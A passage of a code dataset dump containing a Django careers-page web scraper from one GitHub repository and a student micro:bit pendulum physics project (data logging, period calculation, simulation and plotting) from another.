: '#menu-item-266'\n\t \n\t }\n\t },\n\t 'neyer': {\n\t 'search_link' : 'https://www.neyer.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#work > div > div > div > div > div > div > div > div > div > div > div:nth-child(1) > div > div > div > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'galls': {\n\t 'search_link' : 'https://www.galls.com/pages/employment',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.main__wrapper > div > div:nth-child(2) > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'qualcomm': {\n\t 'search_link' : 'https://www.qualcomm.com/company/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#qualcomm-careers > div > div.img-or-text__TextColumnContainer-sc-4fwzi7-0.fwQIjs > div.img-or-text__ColumnCtaGroup-sc-4fwzi7-5.QMWfk > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'campingworldcareers': {\n\t 'search_link' : 'http://www.campingworldcareers.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#MainContent > div.container-fluid.page-content.mb-5 > div.row.content-row.pad-bot-60 > div.col-md-12.col-lg-12.col-xl-10 > div > div:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'yum': {\n\t 'search_link' : 'https://www.yum.com/wps/portal/yumbrands/Yumbrands/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#layoutContainers > div:nth-child(2) > div > div > div > div.stControlBody.stOverflowAuto.wpthemeControlBody > div:nth-child(2) > div > div.container-fluid.hidden-xs > div > nav > section > ul > li:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'tempursealy': {\n\t 'search_link' : 'https://www.tempursealy.com/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div:nth-child(3) > div:nth-child(3) > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'rjcorman': {\n\t 'search_link' : 'https://wfa.kronostm.com/index.jsp?locale=en_US&APPLICATIONNAME=RJCormanKTMDReqExt',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#Div7',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'paducahbank': {\n\t 'search_link' : 'https://www.paducahbank.com/Learn/Company-Information/Careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#mainContent > div.categories > div > div:nth-child(1) > div.col.col-xs-12.col-sm-6.col-md-5.col-md-push-1.col-lg-4.col-lg-push-2 > div > p:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'lexmark': {\n\t 'search_link' : 'https://www.lexmark.com/en_us/careers.html',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.slide-in-panel__page-container > div.par.parsys > div.row.container.section.l-pad > div.col-3-4 > div > div > div.col-1-3 > div > div:nth-child(1) > div > h3 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'heavenhill': {\n\t 'search_link' : 'http://www.heavenhill.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > header > div > div > div > ul > li:nth-child(6) > ul > li:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'fazolis': {\n\t 'search_link' : 'https://www.fazolis.jobs/index.cfm',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#navigationDiv > div:nth-child(6) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n 'moback': {\n\t 'search_link' : 'https://www.moback.com/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#root > div > div > div > div > section:nth-child(4) > p.more-link > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t }\n\t \n\n\t\n\n\t#function for getting the carrier page information\n\tdef JobPortalData(self, company_list):\n\n\t class AppURLopener(urllib.request.FancyURLopener):\n\t version = \"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11\"\n\n\t companys_list = []\n\t time.sleep(3)\n\t #print(company_list)\n\n\t Jobportal_metadata = self.Jobportal_initials[company_list]\n\t \n\t Jobportal_link = Jobportal_metadata['search_link']\n\t scrap_params = Jobportal_metadata['scrap_params']\n\t carrier_page_1 = scrap_params['carrier_page_1']\n\t title_selector = scrap_params['title']\n\t carrier_page_2 = scrap_params['carrier_page_2']\n\t opener = AppURLopener()\n\t page = opener.open(Jobportal_link)\n\t \n\t #page = requests.get(jobportal_url) \n\t time.sleep(2)\n\n\t page_soup = soup(page, 'html.parser')\n\n\t containers = page_soup.select(carrier_page_1)\n\t #print(containers) \n\t from pprint import pprint\n\n\t \n\t \n\t for container in containers:\n\t #Collecting the Company list by state wise\n\t try:\n\t link = container.a['href']\n\t #print(link)\n\t #print(\"ss\")\n\t \n\t if company_list=='accenture':\n\t link=self.accenture+link\n\n\t elif company_list=='hsn':\n\t link=self.hsn+link\n\n\t elif company_list=='irs':\n\t link=self.irs+link\n\n\t elif company_list=='lyondellbasell':\n\t link=self.lyondell+link\n\n\t elif company_list=='lpl':\n\t link=self.lpl+link\n\t \n\t elif company_list=='disneycareers':\n\t link=self.disney+link\n\t \n\t elif company_list=='warnermedia':\n\t link=self.warnermedia+link\n\t \n\t elif company_list=='tapestry':\n\t link=self.tapestry+link\n\t \n\t elif company_list=='startribune':\n\t link=self.startribune+link\n\t \n\t elif company_list=='manulife':\n\t link=self.manulife+link\n\t \n\t else :\n\t print( \" \")\n\t #print(link)\n\t except:\n\t \n\t link=container['href']\n\t #print(link)\n\t \n\t if company_list=='ebags':\n\t link=self.ebags+link\n\t \n\t elif company_list=='lovesac':\n\t link= self.lovesac+link\n\n\t elif company_list=='rhone':\n\t link= self.rhone+link\n\n\t elif company_list=='altria':\n\t link= self.altria_1+link+altria\n\n\t elif company_list=='dell':\n\t link=self.dell+link\n\n\t elif company_list=='tableau':\n\t link= self.tableau+link\n\n\t elif company_list=='arin':\n\t link= self.arin+link\n\n\t elif company_list=='jpcycles':\n\t link= self.jpcycles+link\n\n\t elif company_list=='gigaom':\n\t link= self.gigaom+link\n\t \n\t elif company_list=='zoomcare':\n\t link= self.zoomcare+link\n\n\t elif company_list=='walmart':\n\t link= self.walmart+link\n\n\t elif company_list=='thinkchamplin.':\n\t link= self.thinkchamp+link\n\t \n\t elif company_list=='sbarro':\n\t link= self.sbarro+link \n\t \n\t elif company_list=='newscorp':\n\t link= self.newscrop+link \n\t \n\t elif company_list=='key':\n\t link= self.key+link \n\t \n\t elif company_list=='verizon':\n\t link= self.verizon+link \n\t \n\t elif company_list=='iac':\n\t link= self.iac+link \n\t \n\t elif company_list=='masco':\n\t link= self.masco+link \n\t \n\t elif company_list=='lazboy':\n\t link= self.lazboy+link \n\t \n\t elif company_list=='jiffymix':\n\t link= self.jiffymix+link \n\t \n\t elif company_list=='spartanmash':\n\t ve=link.replace('../','/') \n\t link=self.spartanmash+ve \n\t \n\t elif company_list=='starrett':\n\t link= self.starrett+link \n\t \n\t elif company_list=='fidelity':\n\t link= self.fidelity+link \n\t \n\t elif company_list=='yum':\n\t link= self.yum+link\n\t \n\t elif company_list=='rjcorman':\n\t link= self.rjcorman+link\n\t \n\t elif company_list=='lexmark':\n\t link= self.lexmark+link\n\t \n\t elif company_list=='heavenhill':\n\t link= self.heavenhill+link\n\t elif company_list=='moback':\n\t link= self.moback+link\n\t \n\t else :\n\t print( \" \") \n\t try:\n\t if title_selector is not None:\n\t title = container.select_one(title_selector)\n\t title_text = title.text.strip('\\n').strip('\\t')\n\t else :\n\t title_text = container.text.strip('\\n').strip('\\t')\n\t \n\n\t except Exception as e:\n\t print(\"Something went wrong while fetching data\" + \\\n\t \" from \" + company_list )\n\t else :\n\t companys_list.append(link)\n\t return companys_list\n\n\n\n\n\n\n#company_names = []\n\nargs={}\n\ncompany_names=[]\ndef create_view(request):\n\n\tglobal company_names\n\n\n\tif request.method == \"POST\":\t\t\n\t\tcompany_names = request.POST['input']\n\n\t#return company_names\n\n\treturn render( request,\"inde.html\") \n\n#print()\n\"\"\"\n\n\ndef create_view(request):\n\tglobal COMPANY_LIST, args\n\t#print(request.GET)\n\t#print(request.POST)\n\t#company_namess=[]\n\n\tif request.method == \"GET\":\n\t\targs = {}\n\n\tif request.method == \"POST\":\t\t\n\t\tcompany_names = request.POST['input']\n\t#\tcompany_name.append(company_names)\n\t#\tprint(company_name)\n\t\tif company_names:\n\t\t\tcompany_class = HomePageView()\n\t\t\tcompany_list= company_names.split(\",\")\n\t\t\tfor company_list_name in company_list:\n\t\t\t\tJob_Protal_data = company_class.JobPortalData(company_list_name)\n\t\t\t\n\t\t\tCOMPANY_LIST[company_list_name] = Job_Protal_data[0]\n\t\t\t#print(COMPANY_LIST)\n\n\t\t\targs = {\"Company\":COMPANY_LIST}\n\t\telse:\n\t\t\targs = {}\n\n\n\treturn render( request,\"index.html\", args) \nprint(\"printing company names\")\t\nprint(args)\n\"\"\"\ndef create_api(request):\n\t\n\tapi_list= {\"company_name\":company_names}\n\n\n\t#COMPANY_LIST[company_list_name] = api_list[0]\n\t#print(type(api_list))\n\n\n\t#args_api = {\"Companys\":api_list}\n\t\t\n\n\treturn render(request,\"api.html\", {\"args_api\":api_list})"
},
{
"alpha_fraction": 0.762499988079071,
"alphanum_fraction": 0.762499988079071,
"avg_line_length": 19,
"blob_id": "e71ecea411e450db25a3a30d9f35966e6126ddb1",
"content_id": "62a493e0e0a19a4b61ff0befb5a8d36ce8229b58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 80,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 4,
"path": "/django/spiderapp/forms.py",
"repo_name": "venkateshmoback/spider",
"src_encoding": "UTF-8",
"text": "from django import forms\n\nclass HomePage(forms.Form):\n\tname = forms.CharField()\n"
},
{
"alpha_fraction": 0.734375,
"alphanum_fraction": 0.734375,
"avg_line_length": 18.299999237060547,
"blob_id": "9cd0e40382b28cb7fe448318a08d55631b34ad57",
"content_id": "da298b34f8c5bcac0cbd51277ee214896c02f359",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 10,
"path": "/django/spiderapp/urls.py",
"repo_name": "venkateshmoback/spider",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom django.urls import path\nfrom spiderapp import views\nfrom . import views\n\nurlpatterns = [\n\tpath('', views.create_view),\n\tpath('api/',views.create_api),\n\t\n]"
}
] | 3 |
ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica
|
https://github.com/ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica
|
9bc1968ba575e88123bf3e1076d1843e4a6fe275
|
5bf0fb403fcd54d65c7bf95d138d88f6aa42db71
|
571214b8d4ee841cbe7318b0cb8f8d1624f704df
|
refs/heads/master
| 2021-02-05T15:41:36.360510 | 2020-03-25T00:15:24 | 2020-03-25T00:15:24 | 243,799,108 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5459662079811096,
"alphanum_fraction": 0.5678548812866211,
"avg_line_length": 23.227272033691406,
"blob_id": "8e75e0d7e21780ed19bf70aa3da88b44753b09a4",
"content_id": "c87fd2ac14e1c9a961c82bd5681d17b37c6b56e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1599,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 66,
"path": "/Step 3/receiver.py",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "##################\n# Project 1\n# Step 3\n# Receiver.py\n#\n#\n# Jessica Nordlund\n# Faith Seely\n#################\nimport os\nimport microbit as mb\nimport radio # Needs to be imported separately\n\n\n# GLOBAL VARIABLES\n\n\n# CUSTOM FUNCTIONS\n\n\n# MAIN SCRIPT\n# path='C:/users/draw6/documents/github/project-1-faith-and-jessica/Step 3'\n# os.chdir(path) #Error saying that 'chdir' is not an attribute of 'module'\n\n# Change the channel if other microbits are interfering. (Default=7)\nradio.on() # Turn on radio\nradio.config(channel=5, length =100)\n\nprint('Program Started')\nmb.display.show(mb.Image.HAPPY, delay=1000, clear=True)\n\nfout = open('pendulum.txt', 'w')\n\n# Wait for start message before beginning printing\nincoming = ''\nwhile not incoming == 'start':\n incoming = radio.receive()\nprint('start')\n\nwhile True:\n incoming = radio.receive() # Read from radio\n\n if incoming is not None: # message was received\n mb.display.show(mb.Image.HEART, delay=100, clear=True, wait=False)\n\n #############################################################\n # FILL IN HERE\n # Incoming is string sent from logger\n # Need to parse it and reformat as a tuple for the MU plotter\n #############################################################\n info = incoming.split()\n for elem in info:\n fout.write(elem)\n fout.write(' ')\n fout.write('\\n')\n\n\n tup1 = float(info[0])\n tup2 = float(info[1])\n tup3 = float(info[2])\n tup4 = float(info[3])/1000\n\n data = (tup1, tup2, tup3, tup4)\n print(data)\n\n mb.sleep(10)\n"
},
{
"alpha_fraction": 0.5851708650588989,
"alphanum_fraction": 0.6284454464912415,
"avg_line_length": 30.017093658447266,
"blob_id": "d16dd6aabc418724ffeea843b3b39865a6d0168d",
"content_id": "33f0ffae37d13aba05e895300179c49c07f63f97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3628,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 117,
"path": "/Step 4/Period.py",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "# Project 1\n# Step 4\n# Analysis of Results\n# Period.py\n#\n# Jessica Nordlund \n# Faith Seely\n# \n##################################\n\n# IMPORT STATEMENTS\n##################################\nimport numpy as np\nimport Graphs\nimport matplotlib.pyplot as plt\n\n\n# CUSTOM FUNCTION DEFINITIONS\n###################################\n\n# function: calcPeriod\n# purpose: finds the period of the pendulum\n# paramter: numpy array of accelerations and numpy array of times \n# return: float (calculated period)\ndef calcPeriod(angles, times):\n periods = np.empty(0, dtype=float)\n last_p = 0\n \n for i in range(1,len(angles)):\n if (angles[i-1] > 0 and angles[i] < 0):\n new_p = (times[i-1] + times[i])/2\n periods = np.append(periods, new_p - last_p)\n last_p = new_p\n \n avg_period = 0\n for elem in periods:\n avg_period = avg_period + elem\n \n return avg_period / len(periods)\n\n\n# function: calcAllPeriods\n# purpose: finds the period of the pendulums from the given files\n# paramter: file names\n# file1 = 21 inches\n# file2 = 17 inches\n# file3 = 13 inches\n# file4 = 9 inches\n# file5 = 4.75 inches \n# return: array of periods (floats)\ndef calcAllPeriods(file1, file2, file3, file4, file5):\n acc21 = Graphs.getAccX(file1)\n ang21 = Graphs.calcTheta(acc21,float(21))\n time21 = Graphs.getTime(file1)\n period21 = calcPeriod(ang21,time21)\n print('Calculated period of pendulum with length of 21 inches: ', period21)\n\n acc17 = Graphs.getAccX(file2)\n ang17 = Graphs.calcTheta(acc17,float(17))\n time17 = Graphs.getTime(file2)\n period17 = calcPeriod(ang17,time17)\n print('Calculated period of pendulum with length of 17 inches: ', period17)\n\n acc13 = Graphs.getAccX(file3)\n ang13 = Graphs.calcTheta(acc13,float(13))\n time13 = Graphs.getTime(file3)\n period13 = calcPeriod(ang13,time13)\n print('Calculated period of pendulum with length of 13 inches: ', period13)\n \n acc9 = Graphs.getAccX(file4)\n ang9 = Graphs.calcTheta(acc9,float(9))\n time9 = Graphs.getTime(file4)\n period9 = calcPeriod(ang9,time9)\n print('Calculated period of pendulum with length of 9 inches: ', period9)\n \n acc5 = Graphs.getAccX(file5)\n ang5 = Graphs.calcTheta(acc5,float(4.75))\n time5 = Graphs.getTime(file5)\n period5 = calcPeriod(ang5,time5)\n print('Calculated period of pendulum with length of 4.75 inches:', period5)\n \n return [period21, period17, period13, period9, period5]\n\n\n# function: graphPvL\n# purpose: graphs period vs length of pendulums\n# paramter: numpy array of periods and corresponding lengths\n# return: void\ndef graphPvL(periods, lengths):\n plt.plot(lengths, periods, \"b\")\n plt.ylabel(\"Period (s)\")\n plt.xlabel(\"Length (inches)\")\n plt.title(\"Pendulum Period vs Length\")\n plt.show()\n \n# function: graphLog\n# purpose: takes an array of lengths and an array of periods of a pendulum \n# and graphs the logs of these arrays\n# paramter: numpy array of lengths of pendulum and numpy of periods\n# return: void\ndef graphLog(lens, periods):\n plt.plot(lens, periods, \"-bo\")\n plt.xlabel(\"Length (inches)\")\n plt.ylabel(\"Period (s)\")\n plt.title(\"Pendulum Period vs Length (log scale)\")\n plt.yscale('log')\n plt.xscale('log')\n plt.show()\n\n \n# MAIN SCRIPT\n###################################\nperiods = calcAllPeriods('Data21.csv', 'Data17.csv', 'Data13.csv', \n 'Data9.csv' , 'Data475.csv')\nlengths = [21.0, 17.0, 13.0, 9.0, 4.75]\ngraphPvL(periods, lengths)\ngraphLog(lengths, periods)"
},
{
"alpha_fraction": 0.6465554237365723,
"alphanum_fraction": 0.6559692025184631,
"avg_line_length": 30.594594955444336,
"blob_id": "531b22f0a97c00d5829f47a312b573aa70f552d2",
"content_id": "8bc0adca18b6cf9e0fdd316e9410f8c831f3a673",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2337,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 74,
"path": "/Step 2/step1_theoretical_period.py",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "# Project 1\n# Step 2\n# Theoretical Based Equation Model\n#\n# Jessica Nordlund \n# Faith Seely\n#\n#\n# While this model follows the theoretical equation T = 2pi(L/g)^1/2, this \n# equation does not account for friction or air resistance. It also assumes \n# all the mass of the pendulum is at the end of the string when in reality the\n# string also has mass and its own gravitational pull. This means that the \n# model can only be so accurate and does not fully represent the real pendulum \n# we built.\n# \n##################################\n\n# IMPORT STATEMENTS\n##################################\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# GLOBAL VARIABLES\n###################################\nGRAVITY = 386.09 #inches/ses/sec\n\n# CUSTOM FUNCTION DEFINITIONS\n###################################\n\n# function: estimatePeriod\n# purpose: takes an array of lengths of a pendulum and returns array of \n# estimated periods based on the equation T = 2pi(L/g)^1/2\n# paramter: numpy array of lengths of pendulum\n# return: array of estimated periods of the different pendulums (seconds)\ndef estimatedPeriod(lens):\n result = np.sqrt(lens / GRAVITY)\n result = result * math.pi * 2\n return result\n\n# function: graphValues\n# purpose: takes an array of lengths and an array of periods of a pendulum \n# and graphs the variables (periods vs lengths)\n# paramter: numpy array of lengths of pendulum and numpy of periods\n# return: void\ndef graphValues(lens, periods):\n plt.plot(lens, periods, \"-bo\")\n plt.xlabel(\"Length (inches)\")\n plt.ylabel(\"Period (s)\")\n plt.title(\"Pendulum Period vs Length\")\n plt.show()\n \n# function: graphLog\n# purpose: takes an array of lengths and an array of periods of a pendulum \n# and graphs the logs of these arrays\n# paramter: numpy array of lengths of pendulum and numpy of periods\n# return: void\ndef graphLog(lens, periods):\n plt.plot(lens, periods, \"-bo\")\n plt.xlabel(\"Length (inches)\")\n plt.ylabel(\"Period (s)\")\n plt.title(\"Pendulum Period vs Length (log scale)\")\n plt.yscale('log')\n plt.xscale('log')\n plt.show()\n\n# MAIN SCRIPT\n###################################\nlengths = np.array([5,9,13,17,21])\nperiods = estimatedPeriod(lengths)\ngraphValues(lengths,periods)\ngraphLog(lengths,periods)\nprint(\"Estimated periods (s): \")\nprint(periods)"
},
{
"alpha_fraction": 0.5251396894454956,
"alphanum_fraction": 0.5530726313591003,
"avg_line_length": 28.027027130126953,
"blob_id": "05c1748d5a0c67c644c61ea31225e9b0849ef961",
"content_id": "b3de527b11eb0fd59c6f71927f209a5f02272a8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1074,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 37,
"path": "/README.md",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "# Project1\nProject 1 Starter Code\n\nNames: Faith Seely and Jessica Nordlund\nTeam Name: Faith and Jessica\n\nStep 2 \n included file(s): step1_theoretical_period.py\n file to run to get theoretical data: step1_theoretical_period.py\n \nStep 3\n included file(s): logger.py\n receiver.py\n \nStep 4\n included file(s): Step4.py (duplicate of Graphs.py)\n Graphs.py\n Period.py\n Data21.csv\n Data17.csv\n Data13.csv\n Data9.csv\n Data475.csv\n ( Pendulum21.csv\n Pendulum17.csv\n Pendulum13.csv\n Pendulum9.csv\n Pendulum475.csv )\n file to run to get acceleration and angular position data: Graphs.py\n file to run to get period data: Period.py\n \n *the pendulum.csv files and Step4.py were NOT used in the final version of this project\n \n \nStep 5\n included file(s): Simulation.py\n file to run to get simulated data: Simulation.py\n"
},
{
"alpha_fraction": 0.6093823909759521,
"alphanum_fraction": 0.6242299675941467,
"avg_line_length": 28.58878517150879,
"blob_id": "861aa8dda62334bc392c6cf1a64056767d01667e",
"content_id": "af88d8b090f6f9d54bbdec5a08e03ce6dd918c3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6331,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 214,
"path": "/Step 5/Simulation.py",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "# Project 1\n# Step 5\n# Numerical Simulation Model\n# Model.py\n#\n# Jessica Nordlund \n# Faith Seely\n# \n##################################\n\n# IMPORT STATEMENTS\n##################################\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport time\n\n\n# GLOBAL VARIABLES\n##################################\nGRAVITY = -386.09 #inches/ses/sec\nINIT_VEL = 0\nINIT_POS = math.pi/4\nTIME = 2 #seconds\n\n# CUSTOM FUNCTION DEFINITIONS\n###################################\n\n# function: getInitAcc\n# purpose: finds initial accelertaion given the length of the pendulum\n# paramter: length of pendulum (float)\n# return: float (initial acceleration)\ndef getInitAcc(length):\n return (GRAVITY/length)*math.sin(INIT_POS)\n\n\n# function: newTime\n# purpose: adds a new time in seconds to the given array and returns new \n# paramter: numpy array of times\n# return: modified numpy array of times\ndef newTime(times):\n return np.append(times, time.time())\n\n# function: newVel\n# purpose: finds a new angular velocity given an old angular acceleration\n# paramter: 3 numpy arrays of velocities, accelerations, and times\n# return: numpy array of velocities with calculated velocity added\ndef newVel(accs, vels, times):\n # old w + acc*t \n time_elapsed = times[len(times)-1] - times[len(times)-2]\n new_vel = vels[len(vels)-1] + (accs[len(accs)-1] * time_elapsed)\n return np.append(vels,new_vel)\n \n \n \n# function: newPos\n# purpose: finds a new angular position given an old angular velocity\n# paramter: 3 numpy array of velocities, positions, and times and length of \n# pendulum\n# return: numpy array of positions with calculated position added\ndef newPos(vels, pos, times, length):\n # old pos + old vel*t + (1/2)(g/L sin (old theta) t^2), t = time step\n time_elapsed = times[len(times)-1] - times[len(times)-2]\n term1 = vels[len(vels)-1]\n term2 = (1/2)*(GRAVITY/length)*(math.sin(pos[len(pos)-1]))\n new_pos = pos[len(pos)-1] + term1*time_elapsed + term2*(time_elapsed**2)\n return np.append(pos,new_pos)\n \n\n# function: newAcc\n# purpose: finds a new angular acceleration given an old angular position\n# paramter: numpy array of positions and a numpy array of accelerations and \n# the length of the pendulum\n# return: numpy array of accelerations with calculated acceleration added\ndef newAcc(pos, accs, times, length):\n # G/L SIN THETA\n new_acc = (GRAVITY/length) * math.sin(pos[len(pos)-1])\n return np.append(accs,new_acc)\n\n# function: normalizeTimes\n# purpose: takes the times numpy array and scales it to start at 0 \n# paramter: numpy array of times\n# return: modified numpy array of times\ndef normalizeTimes(times):\n np_len = len(times)\n result = [0]\n temp = times[0]\n \n for i in range(1,np_len-1):\n new_t = (times[i] - temp) + result[i-1]\n temp = times[i]\n result = np.append(result,new_t)\n \n return result\n\n\n# function: graphValues\n# purpose: graphs angular accelertaion, velocity , and position over time\n# paramter: 4 numpy array of accelerations, velocities, positions, and times\n# return: void\ndef graphValues(accs, vels, pos, times):\n plt.subplot(211)\n plt.plot(times, accs, \"b\")\n plt.xlabel(\"Time (s)\")\n plt.ylabel(\"Angular Accleration (radians/s^2)\")\n plt.title(\"Pendulum Acceleration vs Time\")\n plt.show()\n \n plt.subplot(212)\n plt.plot(times, vels, \"r\")\n plt.xlabel(\"Time (s)\")\n plt.ylabel(\"Angular Velocity (radians/sec)\")\n plt.title(\"Pendulum Velocity vs Time\")\n plt.show()\n \n plt.plot(times, pos, \"g\")\n plt.xlabel(\"Time (s)\")\n plt.ylabel(\"Angular Position (radians)\")\n plt.title(\"Pendulum Position vs Time\")\n plt.show()\n\n\n# function: calcPeriod\n# purpose: finds the period of the pendulum\n# paramter: numpy array of angles and numpy array of times \n# return: float (calculated period)\ndef calcPeriod(angles, times):\n p_times = []\n \n #just need one period (two data points since simulated)\n while (len(p_times) < 2):\n for i in range(1,len(angles)):\n #check conditional (anytime changes sign)\n if ((angles[i-1] > 0 and angles[i] < 0) or (angles[i-1] < 0 and angles[i] > 0)):\n p_times = np.append(p_times,times[i])\n break \n \n #multiply by 2 to get full period\n return abs(p_times[1] - p_times[0])*2\n \n \n\n\n\n# function: graphPvL\n# purpose: graphs period vs length of pendulums\n# paramter: numpy array of periods and corresponding lengths\n# return: void\ndef graphPvL(periods, lengths):\n plt.plot(lengths, periods, \"b\")\n plt.ylabel(\"Period (s)\")\n plt.xlabel(\"Length (inches)\")\n plt.title(\"Pendulum Period vs Length\")\n plt.show()\n \n\n# function: graphLog\n# purpose: takes an array of lengths and an array of periods of a pendulum \n# and graphs the logs of these arrays\n# paramter: numpy array of lengths of pendulum and numpy of periods\n# return: void\ndef graphLog(lens, periods):\n plt.plot(lens, periods, \"-bo\")\n plt.xlabel(\"Length (inches)\")\n plt.ylabel(\"Period (s)\")\n plt.title(\"Pendulum Period vs Length (log scale)\")\n plt.yscale('log')\n plt.xscale('log')\n plt.show()\n\n \n\n# MAIN SCRIPT\n###################################\nperiods = []\nlengths = np.array([21.0, 17.0, 13.0, 9.0, 4.75])\n\nfor length in lengths:\n times = [time.time()]\n ang_v = [INIT_VEL]\n ang_x = [INIT_POS]\n ang_a = [getInitAcc(length)]\n \n elapsed_time = 0\n \n while (elapsed_time < TIME):\n times = newTime(times)\n ang_v = newVel(ang_a,ang_v,times)\n ang_x = newPos(ang_v,ang_x,times,length)\n ang_a = newAcc(ang_x,ang_a,times,length)\n \n elapsed_time = time.time() - times[0]\n \n #scale time\n times = normalizeTimes(times)\n \n #make arrays the same shape\n times = times[:30000]\n ang_a = ang_a[:30000]\n ang_v = ang_v[:30000]\n ang_x = ang_x[:30000]\n \n print('****************************************')\n print()\n print('Data for pendulum of length ', length)\n \n graphValues(ang_a,ang_v,ang_x,times)\n period = calcPeriod(ang_x,times)\n \n print('Period: ', period, '(pendulum of length ', length,')')\n periods = np.append(periods,period)\n\ngraphPvL(periods,lengths)\ngraphLog(lengths, periods)"
},
{
"alpha_fraction": 0.5949848294258118,
"alphanum_fraction": 0.6063829660415649,
"avg_line_length": 25.34000015258789,
"blob_id": "d90484c222d14dd227c2f5df9387cf151381e68f",
"content_id": "3d30c20c5a5b0b68816c41b72b62aa82f533ea1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1316,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 50,
"path": "/Step 3/logger.py",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "##################\n# Project 1\n# Step 3\n# Logger.py\n#\n#\n# Jessica Nordlund\n# Faith Seely\n#################\n\nimport microbit as mb\nimport radio # Needs to be imported separately\n\n# Change the channel if other microbits are interfering. (Default=7)\nradio.on() # Turn on radio\nradio.config(channel=5, length=100)\n\nprint('Program Started')\nmb.display.show(mb.Image.HAPPY)\n\nwhile not mb.button_a.is_pressed(): # wait for button A to be pressed to begin logging\n mb.sleep(10)\n\nradio.send('start') # Send the word 'start' to start the receiver\nmb.sleep(1000)\nmb.display.show(mb.Image.HEART) # Display Heart while logging\n\n\n# Read and send accelerometer data repeatedly until button A is pressed again\nwhile not mb.button_a.is_pressed():\n ######################################################\n # FILL In HERE\n # Need to collect accelerometer and time measurements\n # Need to format into a single string\n # Send the string over the radio\n ######################################################\n x = mb.accelerometer.get_x()\n y = mb.accelerometer.get_y()\n z = mb.accelerometer.get_z()\n rel_time = mb.running_time()\n\n message = str(x) + \" \" + str(y) + \" \" + str(z) + \" \" + str(rel_time)\n\n\n radio.send(message)\n mb.sleep(10)\n\n\n\nmb.display.show(mb.Image.SQUARE) # Display Square when program ends"
},
{
"alpha_fraction": 0.6035313010215759,
"alphanum_fraction": 0.6160156726837158,
"avg_line_length": 28.983957290649414,
"blob_id": "02680b11ea498c1162d5c76d74e89930ef9dff80",
"content_id": "8a01e50003d01a9ed7b15756a33878072d5daa86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5607,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 187,
